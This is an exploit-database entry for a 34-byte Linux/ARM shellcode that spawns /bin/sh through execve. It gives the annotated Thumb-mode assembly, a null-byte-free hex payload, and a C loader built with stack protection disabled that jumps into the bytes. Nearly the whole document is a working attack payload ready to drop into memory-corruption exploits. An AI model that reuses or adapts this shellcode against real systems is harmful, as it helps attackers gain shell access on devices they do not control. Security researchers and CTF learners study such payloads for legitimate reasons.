Linux/ARM - execve("/bin/sh", NULL, 0) Shellcode (34 bytes)

EDB-ID:

43520

CVE:

N/A


Author:

dummys


Platform:

ARM

Date:

2017-03-31


/*
Title:  Linux/ARM - execve("/bin/sh", NULL, 0) - 34 bytes
Date:   2017-03-31
Tested: armv7l
Author: Jonathan 'dummys' Borgeaud - twitter: @dummys1337
fapperz.org

Shellcode ARM without 0x20, 0x0a and 0x00

assembly shellcode: as -o sc.o sc.s

.syntax unified
.global main
.code 32
main:
    add  r3, pc, #1      /* add 0x1 to pc to prepare the switch to thumb mode */
    bx   r3              /* switch to thumb mode */
.thumb
    mov  r0, pc          /* move pc to r0 */
    adds r0, #14         /* make r0 to point to /bin//sh */
    str  r0, [sp, #4]    /* store /bin//sh to the stack */
    subs r1, r1, r1      /* put 0 in r1 */
    subs r2, r2, r2      /* put 0 in r2 */
    movs r7, #8          /* move 8 in r7 */
    str r2, [r0, r7]     /* store nullbytes at the end of /bin//sh */
    adds r7, #3          /* add 3 to r7 for execve syscall */
    svc  1               /* call execve */
    str  r7, [r5, #32]   /* thumb instruction for "/b" string */
    ldr  r1, [r5, #100]  /* thumb instruction for "in" string */
    cmp  r7, #0x2f       /* thumb instruction for "//" string */
    ldr  r3, [r6, #4]    /* thumb instruction for "sh" string */


compiler c: gcc -marm -fno-stack-protector -z execstack -o loader loader.c

*/

#include <stdio.h>
#include <string.h>

char *SC =      "\x01\x30\x8f\xe2"
                "\x13\xff\x2f\xe1"
                "\x78\x46\x0e\x30"
                "\x01\x90\x49\x1a"
                "\x92\x1a\x08\x27"
                "\xc2\x51\x03\x37"
                "\x01\xdf\x2f\x62"
                "\x69\x6e\x2f\x2f"
                "\x73\x68";

int main(void)
{
    char payload[34];

    memcpy(payload, SC, 34);

    fprintf(stdout, "Length: %d\n", strlen(SC));
    (*(void(*)()) payload) ();

return 0;
}